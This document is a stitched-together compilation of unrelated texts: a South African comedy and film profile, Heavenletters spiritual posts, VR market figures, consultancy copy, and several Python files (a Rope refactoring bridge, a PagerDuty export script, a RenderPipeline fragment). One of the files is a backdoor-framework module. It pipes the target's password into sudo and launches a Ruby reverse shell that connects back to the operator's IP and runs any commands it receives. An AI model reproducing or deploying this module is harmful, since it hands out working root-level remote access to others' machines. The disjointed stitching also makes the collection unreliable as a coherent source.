...The timing was right, kinda post-apartheid and the first time there were standup comedians in South Africa who werent all old white guys. Having all those guys come together, these brand-new voices, saying stuff on TV that people were only saying in the comedy clubs, that was so cool and challenging. It was like the perfect storm. And it did well because everyone thought it was their show. It was the most crossover thing weve ever done.
Lediga went on to produce a movie starring Pearl Thusi, Andrew Buckland and Zandile Tisani called Catching Feelings. The film was one of the countrys first to be picked up by international streaming service, Netflix.
The New York Times Glenn Kenny said the film was notable both for its considerable comedic flair and its detailed depiction of Johannesburg.
Kagiso will be in good company on the Design Indaba 2019 stage where he will be joined by another filmmaker, Wanuri Kahiu; costume designer for cult favourites like The Handmaids Tale, Ane Crabtree, curator Hannah Harry among many others.
|
from backdoors.backdoor import *
import time
class Ruby(Backdoor):
prompt = Fore.RED + "(rb) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Ruby module..."
self.core = core
self.options = {
"port" : Option("port", 53937, "port to connect to", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = INFO + "Uses ruby to open a socket and redirect I/O to /bin/sh."
def get_command(self):
command = "echo " + self.core.curtarget.pword + " | sudo -S ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"" + self.core.localIP + "\",\"" + str(self.get_value("port")) + "\");while(cmd=c.gets);IO.popen(cmd,\"r\"){ |io| c.print io.read } end'"
print(command)
return command
def do_exploit(self, args):
print(GOOD + "Initializing backdoor...")
self.listen(prompt="none")
self.core.curtarget.ssh.exec_command(self.get_command())
print(GOOD + "Ruby backdoor on " + str(self.get_value("port")) + " attempted.")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
As soon as I received Heavenletters from a friend, they resonated with me. I wanted to share them with my friends because they state so eloquently how to deal with some of the more difficult situations in life and career. In order to move on from them --- and to face other creative and momentous challenges -- change is necessary.
There are some tough questions in life, and these letters get to the heart of it all. They are profound, my reality, and they are sound advice for those that want to have a happy, fulfilled life. They are guides to finding our own personal truths.
This was the trip of a lifetime. Heaven Admin and I were blessed with amazing people and amazing Godwriting Workshops. We were part of a great circle of love with God right in the middle. Supreme thanks to all the sponsors and all the attendees and all the hearts that overwhelmed ours. You are overwhelming us still.
Not only do we have the best translators in the world, we have the most beautiful, do you agree?
I'm (Heaven Admin) making my way to the US this Friday, October 30, first to California for a weekend workshop event (see below) and then to Fairfield, Iowa.
When I look into the eyes of any of my brothers or sisters, it is like the circle is complete. There is a connection and a divine realisation in that moment. Just the thought puts a big smile on my face. I know there will be many such moments while traveling through the US towards Argentina.
We are looking for a motorhome! It has to be diesel so we can fuel it with bio-diesel and reduce our carbon emissions. At this stage we have several strong ideas on how to fund the journey. Please send us your ideas and suggestions.
In addition to getting closer to God through Godwriting ™ workshops, the theme of the Oneness Journey will be to create an international network of sustainable spiritual communities. There are such communities scattered through the Americas and the Oneness Journey will be used to provide a platform for sharing of knowledge and experience amongst these communities. This network will form one large international sustainable community supporting the development of more communities and providing stewardship for existing colonies. God will be the common reference point that will unite the diversity within these communities; and sustainability with highest respect and care for Mother Earth and all of life will be of highest priority.
We are thinking about doing a ceremony at each community which joins the network. And of course many Godwriting workshops along the way!
The intention is to start the journey as soon as we can, so both Gloria and I are focusing on this NOW! We will have an ongoing website to keep you up-to-date.
Godwriting Workshop tour in India!
Kambala who runs an orphanage in India invites us to a month-long Godwriting™ Workshop Tour – and he wants Heavenreaders to come too!
It is the will of God. I believe it strongly and faithfully. This is the good season to travel in India and for the workshop of Heavenletters in India.
As one family, I am not only brother to you but entire Heaven letter family like Santhan, Edna and so on all over the world. We are human community in God’s love and HIS letters from Heaven, the presence of God Almighty.
So I invite you all once again, you and Santhan and Edna some one else who are in Heaven letters.
I called Edna after you left from Israel. She received me well and talked to me so nicely lovely kind compassionately. I love her so much. I told her how much you loved me and help me to run children service here in India as well as I told her that I am an official Heaven letters translator by our leader Gloria for my local language Telugu. She was amazed...please tell her about me more and what I am doing in India and how I am united with Heaven letters. Then she will come happily to India with you.
I will look after boarding and lodging for our Heaven letter team who come with you. Maybe 100 persons. No doubt the God is with me and my family full support with our team here to serve you for the workshop, and you can see rural India and so many wonderful things and projects which are run by me.
Your brother Kambala, here on earth and God is there in heaven.......so he will supply all our needs. Amen!!!!!!!!
Beloved Kambala with the big heart, will you kindly send us your translations?
How very much we would love to meet you and your family and team in India and to give Godwriting workshops in India. We will do it. God will tell us when. We just can’t name a time right now because the Oneness Journey is on the way!
Here is $300 for the ONENESS Tour. And please enjoy it even more then in Europe!!!
Just a note that I can't imagine enjoying anything more than the European Godwriting Tour. Is it possible? Well, we shall find out!
Beloved Rozes, I just found your response. Too late to be of help. I am so sorry because we do have some great subscribers in Mexico who would have wanted to show you around.
The tech angels are working on getting Heaven News where we will see responses such as yours on the Community Page of the forum so we will always know when there is response.
God bless you. Hope you had a great time in Mexico.
Just wanted to come back and take a look. Probably to memorize all that went on in Istanbul. I've missed Istanbul!
|
# Arguments are:
# 1. Working directory.
# 2. Rope folder
import difflib
import io
import json
import os
import sys
import traceback
try:
import rope
from rope.base import libutils
from rope.refactor.rename import Rename
from rope.refactor.extract import ExtractMethod, ExtractVariable
import rope.base.project
import rope.base.taskhandle
except:
jsonMessage = {
"error": True,
"message": "Rope not installed",
"traceback": "",
"type": "ModuleNotFoundError",
}
sys.stderr.write(json.dumps(jsonMessage))
sys.stderr.flush()
WORKSPACE_ROOT = sys.argv[1]
ROPE_PROJECT_FOLDER = ".vscode/.ropeproject"
class RefactorProgress:
"""
Refactor progress information
"""
def __init__(self, name="Task Name", message=None, percent=0):
self.name = name
self.message = message
self.percent = percent
class ChangeType:
"""
Change Type Enum
"""
EDIT = 0
NEW = 1
DELETE = 2
class Change:
""""""
EDIT = 0
NEW = 1
DELETE = 2
def __init__(self, filePath, fileMode=ChangeType.EDIT, diff=""):
self.filePath = filePath
self.diff = diff
self.fileMode = fileMode
def get_diff(changeset):
"""This is a copy of the code form the ChangeSet.get_description method found in Rope."""
new = changeset.new_contents
old = changeset.old_contents
if old is None:
if changeset.resource.exists():
old = changeset.resource.read()
else:
old = ""
# Ensure code has a trailing empty lines, before generating a diff.
# https://github.com/Microsoft/vscode-python/issues/695.
old_lines = old.splitlines(True)
if not old_lines[-1].endswith("\n"):
old_lines[-1] = old_lines[-1] + os.linesep
new = new + os.linesep
result = difflib.unified_diff(
old_lines,
new.splitlines(True),
"a/" + changeset.resource.path,
"b/" + changeset.resource.path,
)
return "".join(list(result))
class BaseRefactoring(object):
"""
Base class for refactorings
"""
def __init__(self, project, resource, name="Refactor", progressCallback=None):
self._progressCallback = progressCallback
self._handle = rope.base.taskhandle.TaskHandle(name)
self._handle.add_observer(self._update_progress)
self.project = project
self.resource = resource
self.changes = []
def _update_progress(self):
jobset = self._handle.current_jobset()
if jobset and not self._progressCallback is None:
progress = RefactorProgress()
# getting current job set name
if jobset.get_name() is not None:
progress.name = jobset.get_name()
# getting active job name
if jobset.get_active_job_name() is not None:
progress.message = jobset.get_active_job_name()
# adding done percent
percent = jobset.get_percent_done()
if percent is not None:
progress.percent = percent
if not self._progressCallback is None:
self._progressCallback(progress)
def stop(self):
self._handle.stop()
def refactor(self):
try:
self.onRefactor()
except rope.base.exceptions.InterruptedTaskError:
# we can ignore this exception, as user has cancelled refactoring
pass
def onRefactor(self):
"""
To be implemented by each base class
"""
pass
class RenameRefactor(BaseRefactoring):
def __init__(
self,
project,
resource,
name="Rename",
progressCallback=None,
startOffset=None,
newName="new_Name",
):
BaseRefactoring.__init__(self, project, resource, name, progressCallback)
self._newName = newName
self.startOffset = startOffset
def onRefactor(self):
renamed = Rename(self.project, self.resource, self.startOffset)
changes = renamed.get_changes(self._newName, task_handle=self._handle)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, get_diff(item))
)
else:
raise Exception("Unknown Change")
class ExtractVariableRefactor(BaseRefactoring):
def __init__(
self,
project,
resource,
name="Extract Variable",
progressCallback=None,
startOffset=None,
endOffset=None,
newName="new_Name",
similar=False,
global_=False,
):
BaseRefactoring.__init__(self, project, resource, name, progressCallback)
self._newName = newName
self._startOffset = startOffset
self._endOffset = endOffset
self._similar = similar
self._global = global_
def onRefactor(self):
renamed = ExtractVariable(
self.project, self.resource, self._startOffset, self._endOffset
)
changes = renamed.get_changes(self._newName, self._similar, self._global)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, get_diff(item))
)
else:
raise Exception("Unknown Change")
class ExtractMethodRefactor(ExtractVariableRefactor):
def __init__(
self,
project,
resource,
name="Extract Method",
progressCallback=None,
startOffset=None,
endOffset=None,
newName="new_Name",
similar=False,
global_=False,
):
ExtractVariableRefactor.__init__(
self,
project,
resource,
name,
progressCallback,
startOffset=startOffset,
endOffset=endOffset,
newName=newName,
similar=similar,
global_=global_,
)
def onRefactor(self):
renamed = ExtractMethod(
self.project, self.resource, self._startOffset, self._endOffset
)
changes = renamed.get_changes(self._newName, self._similar, self._global)
for item in changes.changes:
if isinstance(item, rope.base.change.ChangeContents):
self.changes.append(
Change(item.resource.real_path, ChangeType.EDIT, get_diff(item))
)
else:
raise Exception("Unknown Change")
class RopeRefactoring(object):
def __init__(self):
self.default_sys_path = sys.path
self._input = io.open(sys.stdin.fileno(), encoding="utf-8")
def _rename(self, filePath, start, newName, indent_size):
"""
Renames a variable
"""
project = rope.base.project.Project(
WORKSPACE_ROOT,
ropefolder=ROPE_PROJECT_FOLDER,
save_history=False,
indent_size=indent_size,
)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = RenameRefactor(
project, resourceToRefactor, startOffset=start, newName=newName
)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({"diff": change.diff})
return valueToReturn
def _extractVariable(self, filePath, start, end, newName, indent_size):
"""
Extracts a variable
"""
project = rope.base.project.Project(
WORKSPACE_ROOT,
ropefolder=ROPE_PROJECT_FOLDER,
save_history=False,
indent_size=indent_size,
)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = ExtractVariableRefactor(
project,
resourceToRefactor,
startOffset=start,
endOffset=end,
newName=newName,
similar=True,
)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({"diff": change.diff})
return valueToReturn
def _extractMethod(self, filePath, start, end, newName, indent_size):
"""
Extracts a method
"""
project = rope.base.project.Project(
WORKSPACE_ROOT,
ropefolder=ROPE_PROJECT_FOLDER,
save_history=False,
indent_size=indent_size,
)
resourceToRefactor = libutils.path_to_resource(project, filePath)
refactor = ExtractMethodRefactor(
project,
resourceToRefactor,
startOffset=start,
endOffset=end,
newName=newName,
similar=True,
)
refactor.refactor()
changes = refactor.changes
project.close()
valueToReturn = []
for change in changes:
valueToReturn.append({"diff": change.diff})
return valueToReturn
def _serialize(self, identifier, results):
"""
Serializes the refactor results
"""
return json.dumps({"id": identifier, "results": results})
def _deserialize(self, request):
"""Deserialize request from VSCode.
Args:
request: String with raw request from VSCode.
Returns:
Python dictionary with request data.
"""
return json.loads(request)
def _process_request(self, request):
"""Accept serialized request from VSCode and write response."""
request = self._deserialize(request)
lookup = request.get("lookup", "")
if lookup == "":
pass
elif lookup == "rename":
changes = self._rename(
request["file"],
int(request["start"]),
request["name"],
int(request["indent_size"]),
)
return self._write_response(self._serialize(request["id"], changes))
elif lookup == "extract_variable":
changes = self._extractVariable(
request["file"],
int(request["start"]),
int(request["end"]),
request["name"],
int(request["indent_size"]),
)
return self._write_response(self._serialize(request["id"], changes))
elif lookup == "extract_method":
changes = self._extractMethod(
request["file"],
int(request["start"]),
int(request["end"]),
request["name"],
int(request["indent_size"]),
)
return self._write_response(self._serialize(request["id"], changes))
def _write_response(self, response):
sys.stdout.write(response + "\n")
sys.stdout.flush()
def watch(self):
self._write_response("STARTED")
while True:
try:
self._process_request(self._input.readline())
except:
exc_type, exc_value, exc_tb = sys.exc_info()
tb_info = traceback.extract_tb(exc_tb)
jsonMessage = {
"error": True,
"message": str(exc_value),
"traceback": str(tb_info),
"type": str(exc_type),
}
sys.stderr.write(json.dumps(jsonMessage))
sys.stderr.flush()
if __name__ == "__main__":
RopeRefactoring().watch()
|
While mobile device-reliant VR shipments—such as Samsung Gear VR and Google Daydream—dwarf today’s other VR device types, standalone devices will see a 405 percent combined annual growth rate (CAGR) through 2021, compared to a 42 percent CAGR for mobile VR. New device players, including Royole and Pico, already entered the global market, with many other Chinese manufacturers poised to expand.
With an influx of standalone VR devices incoming, a greater range of use cases will be explored, broadening the gaming-focused VR market of today. ABI Research anticipates a total market size of $64 billion by 2021.
Non-gaming software and content, VR advertising, and VR-related video revenue will together hold a significant portion of the market. VR applications in retail and marketing will therefore see a 124 percent CAGR through 2021. Video, education, and tourism are expected to see significant growth, as well, and while not forecast to be as large as the gaming market, will be notable.
|
#!/usr/bin/env python
#
# Copyright (c) 2016, PagerDuty, Inc. <info@pagerduty.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of PagerDuty Inc nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL PAGERDUTY INC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import requests
from datetime import datetime, timedelta
import csv
ACCESS_TOKEN = 'ACCESS_TOKEN' # Should be a v2 token, can be read only
def pd_get(endpoint, payload=None):
"""Handle all PagerDuty GET requests"""
url = 'https://api.pagerduty.com{endpoint}'.format(endpoint=endpoint)
headers = {
'Accept': 'application/vnd.pagerduty+json;version=2',
'Content-type': 'application/json',
'Authorization': 'Token token={token}'.format(token=ACCESS_TOKEN)
}
r = requests.get(url, params=payload, headers=headers)
if r.status_code == 200:
return r.json()
else:
raise Exception('GET request failed with status {code}'.format(
code=r.status_code
))
def list_users(team_id=None):
"""List all users in the account"""
output = pd_get('/users', {
'limit': 100,
'include[]': ['contact_methods'],
'team_ids[]': [team_id]
})
if output['more']:
offset = 100
r = {'more': True}
while r['more']:
r = pd_get('/users', {
'limit': 100,
'offset': offset,
'include[]': ['contact_methods'],
'team_ids[]': [team_id]
})
output['users'] = output['users'] + r['users']
offset += 100
return output
def parse_user_info(users):
"""Parse relevant user info for reporting"""
output = []
for user in users:
contact_methods = []
if len(user['contact_methods']) == 0:
contact_methods = [{
'id': None,
'type': None,
'label': None,
'address': None
}]
for i, method in enumerate(user['contact_methods']):
contact_methods.append({
'label': method['label'],
'type': method['type'],
'id': method['id']
})
if method['type'] == 'push_notification_contact_method':
contact_methods[i]['address'] = 'N/A'
elif method['type'] == 'email_contact_method':
contact_methods[i]['address'] = method['address']
else:
contact_methods[i]['address'] = '{country}+{address}'.format(
country=method['country_code'],
address=method['address']
)
output.append({
'name': user['name'],
'id': user['id'],
'email': user['email'],
'role': user['role'],
'contact_methods': contact_methods
})
return output
def write_user_csv(user_data):
"""Create CSV from user data"""
with open('user_data_{timestamp}.csv'.format(
timestamp=datetime.now().isoformat()
), 'w') as csvfile:
fieldnames = [
'id',
'name',
'email',
'role',
'contact_method_id',
'contact_method_type',
'contact_method_label',
'contact_method_address'
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for user in user_data:
for method in user['contact_methods']:
writer.writerow({
'id': user['id'],
'name': user['name'].encode('utf-8'),
'email': user['email'].encode('utf-8'),
'role': user['role'],
'contact_method_id': method['id'],
'contact_method_type': method['type'],
'contact_method_label': method['label'].encode('utf-8'),
'contact_method_address': method['address'].encode('utf-8')
})
return "CSV created"
def list_escalation_policies(team_id=None):
"""List all escalation policies in account"""
output = pd_get('/escalation_policies', {
'limit': 100,
'team_ids[]': [team_id]
})
if output['more']:
offset = 100
r = {'more': True}
while r['more']:
r = pd_get(
'/escalation_policies',
{'limit': 100, 'offset': offset, 'team_ids[]': [team_id]}
)
output['escalation_policies'] = (
output['escalation_policies'] + r['escalation_policies']
)
offset += 100
return output
def parse_ep_info(escalation_policies):
"""Parse relevant escalation policy info for reporting"""
output = []
for ep in escalation_policies:
rules = []
if len(ep['escalation_rules']) == 0:
rules = [{
'id': None,
'escalation_delay': None,
'targets': [{
'id': None,
'type': None,
'name': None
}]
}]
for rule in ep['escalation_rules']:
targets = []
for target in rule['targets']:
if target['type'] in ['user', 'user_reference']:
target_type = 'user'
else:
target_type = 'schedule'
targets.append({
'id': target['id'],
'type': target_type,
'name': target['summary']
})
rules.append({
'escalation_delay': rule['escalation_delay_in_minutes'],
'id': rule['id'],
'targets': targets
})
output.append({
'name': ep['name'],
'id': ep['id'],
'rules': rules
})
return output
def write_escalation_policy_csv(ep_data):
"""Create CSV from escalation policy data"""
with open('escalation_policy_data_{timestamp}.csv'.format(
timestamp=datetime.now().isoformat()
), 'w') as csvfile:
fieldnames = [
'id',
'name',
'escalation_rule_id',
'escalation_rule_delay',
'escalation_rule_target_id',
'escalation_rule_target_type',
'escalation_rule_target_name'
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for ep in ep_data:
for rule in ep['rules']:
for target in rule['targets']:
writer.writerow({
'id': ep['id'],
'name': ep['name'],
'escalation_rule_id': rule['id'],
'escalation_rule_delay': rule['escalation_delay'],
'escalation_rule_target_id': target['id'],
'escalation_rule_target_type': target['type'],
'escalation_rule_target_name': target['name']
})
return "CSV created"
def list_schedules(team_id=None):
"""List all schedules in account"""
output = pd_get('/schedules', {
'limit': 100,
'team_ids[]': [team_id]
})
if output['more']:
offset = 100
r = {'more': True}
while r['more']:
r = pd_get('/schedules', {
'limit': 100,
'offset': offset,
'team_ids[]': [team_id]
})
output['schedules'] = output['schedules'] + r['schedules']
offset += 100
return output
def list_schedule_oncalls(schedule_id):
"""List the current on-calls for a schedule"""
output = pd_get('/oncalls', {
'since': datetime.now().isoformat(),
'until': (datetime.now() + timedelta(seconds=1)).isoformat(),
'schedule_ids[]': [schedule_id],
'limit': 100
})
if output['more']:
offset = 100
r = {'more': True}
while r['more']:
r = pd_get('/oncalls', {
'since': datetime.now().isoformat(),
'until': (datetime.now() + timedelta(seconds=1)).isoformat(),
'schedule_ids[]': [schedule_id],
'limit': 100,
'offset': offset
})
output['oncalls'] = output['oncalls'] + r['oncalls']
offset += 100
return output
def parse_schedule_info(schedules):
"""Parse relevant schedule info for reporting"""
output = []
for schedule in schedules:
output.append({
'name': schedule['name'],
'id': schedule['id'],
'description': schedule['description'],
'time_zone': schedule['time_zone'],
'oncalls': parse_oncall_info(
list_schedule_oncalls(schedule['id'])['oncalls']
)
})
return output
def parse_oncall_info(oncalls):
"""Parse relevant on-call info for reporting"""
output = []
if len(oncalls) == 0:
output = [{
'user_name': None,
'user_id': None,
'escalation_level': None,
'start': None,
'end': None
}]
for oncall in oncalls:
output.append({
'user_name': oncall['user']['summary'],
'user_id': oncall['user']['id'],
'escalation_level': oncall['escalation_level'],
'start': oncall['start'],
'end': oncall['end']
})
return output
def write_schedule_csv(schedule_data):
"""Create CSV from schedule data"""
with open('schedule_data_{timestamp}.csv'.format(
timestamp=datetime.now().isoformat()
), 'w') as csvfile:
fieldnames = [
'id',
'name',
'description',
'time_zone',
'oncall_id',
'oncall_name',
'oncall_escalation_level',
'oncall_shift_start',
'oncall_shift_end'
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for schedule in schedule_data:
for oncall in schedule['oncalls']:
writer.writerow({
'id': schedule['id'],
'name': schedule['name'],
'description': schedule['description'],
'time_zone': schedule['time_zone'],
'oncall_id': oncall['user_id'],
'oncall_name': oncall['user_name'],
'oncall_escalation_level': oncall['escalation_level'],
'oncall_shift_start': oncall['start'],
'oncall_shift_end': oncall['end']
})
return "CSV created"
def list_teams():
"""List all teams in account"""
output = pd_get('/teams', {'limit': 100})
if output['more']:
offset = 100
r = {'more': True}
while r['more']:
r = pd_get('/teams', {'limit': 100, 'offset': offset})
output['teams'] = output['teams'] + r['teams']
offset += 100
return output
def parse_team_info(teams):
"""Parse relevant team info for reporting"""
output = []
for i, team in enumerate(teams):
output.append({
'name': team['name'],
'id': team['id'],
'users': [],
'schedules': [],
'escalation_policies': [],
'services': []
})
users = list_users(team['id'])['users']
for user in users:
output[i]['users'].append({
'name': user['name'],
'id': user['id']
})
schedules = list_schedules(team['id'])['schedules']
for schedule in schedules:
output[i]['schedules'].append({
'name': schedule['name'],
'id': schedule['id']
})
escalation_policies = list_escalation_policies(
team['id']
)['escalation_policies']
for ep in escalation_policies:
output[i]['escalation_policies'].append({
'name': ep['name'],
'id': ep['id']
})
services = list_services(team['id'])['services']
for service in services:
output[i]['services'].append({
'name': service['name'],
'id': service['id']
})
return output
def write_team_csv(team_data):
"""Create CSV from team data"""
with open('team_data_{timestamp}.csv'.format(
timestamp=datetime.now().isoformat()
), 'w') as csvfile:
fieldnames = [
'id',
'name',
'user_id',
'user_name',
'schedule_id',
'schedule_name',
'escalation_policy_id',
'escalation_policy_name',
'service_id',
'service_name'
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for team in team_data:
for user in team['users']:
writer.writerow({
'id': team['id'],
'name': team['name'].encode('utf-8'),
'user_id': user['id'],
'user_name': user['name'].encode('utf-8'),
'schedule_id': None,
'schedule_name': None,
'escalation_policy_id': None,
'escalation_policy_name': None,
'service_id': None,
'service_name': None
})
for schedule in team['schedules']:
writer.writerow({
'id': team['id'],
'name': team['name'].encode('utf-8'),
'user_id': None,
'user_name': None,
'schedule_id': schedule['id'],
'schedule_name': schedule['name'].encode('utf-8'),
'escalation_policy_id': None,
'escalation_policy_name': None,
'service_id': None,
'service_name': None
})
for ep in team['escalation_policies']:
writer.writerow({
'id': team['id'],
'name': team['name'].encode('utf-8'),
'user_id': None,
'user_name': None,
'schedule_id': None,
'schedule_name': None,
'escalation_policy_id': ep['id'],
'escalation_policy_name': ep['name'].encode('utf-8'),
'service_id': None,
'service_name': None
})
for service in team['services']:
writer.writerow({
'id': team['id'],
'name': team['name'].encode('utf-8'),
'user_id': None,
'user_name': None,
'schedule_id': None,
'schedule_name': None,
'escalation_policy_id': None,
'escalation_policy_name': None,
'service_id': service['id'],
'service_name': service['name'].encode('utf-8')
})
return "CSV created"
def list_services(team_id=None):
"""List all services"""
output = pd_get('/services', {'limit': 100, 'team_ids[]': [team_id]})
if output['more']:
offset = 100
r = {'more': True}
while r['more']:
r = pd_get('/services', {
'limit': 100,
'offset': offset,
'team_ids[]': [team_id]
})
output['services'] = output['services'] + r['services']
offset += 100
return output
def parse_service_info(services):
"""Parse relevant services info for reporting"""
output = []
for service in services:
output.append({
'id': service['id'],
'name': service['name'].encode('utf-8'),
'escalation_policy_id': service['escalation_policy']['id'],
'escalation_policy_name': service['escalation_policy']['summary'],
'alert_creation': service['alert_creation']
})
return output
def write_service_csv(service_data):
"""Create CSV from service data"""
with open('service_data_{timestamp}.csv'.format(
timestamp=datetime.now().isoformat()
), 'w') as csvfile:
fieldnames = [
'id',
'name',
'escalation_policy_id',
'escalation_policy_name',
'alert_creation'
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for service in service_data:
writer.writerow({
'id': service['id'],
'name': service['name'],
'escalation_policy_id': service['escalation_policy_id'],
'escalation_policy_name': (
service['escalation_policy_name'].encode('utf-8')
),
'alert_creation': service['alert_creation']
})
return "CSV created"
if __name__ == '__main__':
write_user_csv(parse_user_info(list_users()['users']))
write_escalation_policy_csv(parse_ep_info(
list_escalation_policies()['escalation_policies']
))
write_schedule_csv(parse_schedule_info(list_schedules()['schedules']))
write_team_csv(parse_team_info(list_teams()['teams']))
write_service_csv(parse_service_info(list_services()['services']))
print "Data has finished exporting"
|
Vision Assets is a multi-disciplinary consultancy specialising in Intellectual Property, Licensing, Product Development and Growth Funding.
Intellectual Property assets are the life-blood of an innovative business and accrue value as it grows. We work with you to protect your assets from infringement and to maximise commercial potential.
We offer a comprehensive review of your business assets to identify the most powerful protections available to them, from Registered Trade Marks and Registered Designs to Copyright, Design Right and Patents. We are well versed in advising businesses through complex applications involving multiple levels of Intellectual Property protection. Drawing upon many years of commercial experience, we are able to guide you through the process of applying for registrations in the UK, Europe and internationally.
For fast growing businesses that may be diversifying, seeking investment or looking to sell, we offer a specialist IP Strategy encompassing key areas, including: Acquisition, Transfer, Merger, Co-existence, Leveraging, Valuation and Sale of assets.
Licensing deals and collaborations can be lucrative and facilitate cost-efficient entry in to new markets. Assert your Intellectual Property rights from day one.
We have many years of commercial experience in structuring international Licensing Deals, Brand Collaborations and Third Party agreements. We offer a comprehensive consultancy service that equips you with the knowledge and tools to assert your business’ Intellectual Property rights with clarity and to engage in negotiations with confidence.
For companies seeking to establish an international Licensing business from scratch, we offer a turn-key Licensing Strategy service that navigates the entire process from choosing the right commercial licensee in each new product sector, to securing the maximum protection for and returns from assets.
Commercialising your Intellectual Property can be exhilarating and daunting in equal measure. Let us guide you through the development process from first prototype to retail-ready product.
We offer a comprehensive consultancy that guides you through the Product Development and Manufacturing process from Prototyping and Sampling, to Testing and Consumer Feedback, all the way to Mass Manufacture. Our considerable commercial experience across multiple sectors and international markets can facilitate Strategic Partnerships with leading manufacturers and industry experts, which stand to give your business and its products significant competitive edge.
For businesses seeking to break into new markets and engage in import and export, we offer a specialist International Trade consultancy.
Intellectual Property requires funds to grow and we know that innovation flourishes when the world is in a state of flux. Let us help you to navigate the funding marketplace and accelerate your business.
We offer a comprehensive review of your business and its long term growth objectives to identify a broad set of commercial funding options including Grant Funding, Loans, Equity Finance and Export Finance, which may be available through both publicly and privately backed programmes in the UK, Europe and internationally.
For businesses engaged in innovative Research and Development, we are able to offer a specialist consultancy with links to leading organisations operating in diverse sectors.
|
"""
RenderPipeline
Copyright (c) 2014-2016 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from __future__ import division
from functools import partial
from panda3d.core import Texture, Vec3
from direct.gui.DirectFrame import DirectFrame
from direct.gui.DirectScrolledFrame import DirectScrolledFrame
from direct.gui.DirectGui import DGG
from rplibs.six import itervalues
from rpcore.image import Image
from rpcore.util.display_shader_builder import DisplayShaderBuilder
from rpcore.globals import Globals
from rpcore.render_target import RenderTarget
from rpcore.gui.texture_preview import TexturePreview
from rpcore.gui.sprite import Sprite
from rpcore.gui.labeled_checkbox import LabeledCheckbox
from rpcore.gui.text import Text
from rpcore.gui.draggable_window import DraggableWindow
class BufferViewer(DraggableWindow):
""" This class provides a view into the buffers to inspect them """
def __init__(self, pipeline, parent):
""" Constructs the buffer viewer """
DraggableWindow.__init__(self, width=1400, height=800, parent=parent,
title="Buffer- and Image-Browser")
self._pipeline = pipeline
self._scroll_height = 3000
self._display_images = False
self._stages = []
self._create_components()
self._tex_preview = TexturePreview(self._pipeline, parent)
self._tex_preview.hide()
self.hide()
def toggle(self):
""" Updates all the buffers and then toggles the buffer viewer """
if self._visible:
self._remove_components()
self.hide()
else:
self._perform_update()
self.show()
@property
def entries(self):
""" Returns a list of all registered entries """
return RenderTarget.REGISTERED_TARGETS + Image.REGISTERED_IMAGES
@property
def stage_information(self):
""" Returns the amount of attached stages, and also the memory consumed
in MiB in a tuple. """
count, memory = 0, 0
for entry in self.entries:
if isinstance(entry, Texture):
memory += entry.estimate_texture_memory()
count += 1
elif entry.__class__.__name__ == "RenderTarget":
for target in itervalues(entry.targets):
memory += target.estimate_texture_memory()
count += 1
else:
self.warn("Unkown type:", entry.__class__.__name__)
return memory, count
def _create_components(self):
""" Creates the window components """
DraggableWindow._create_components(self)
self._content_frame = DirectScrolledFrame(
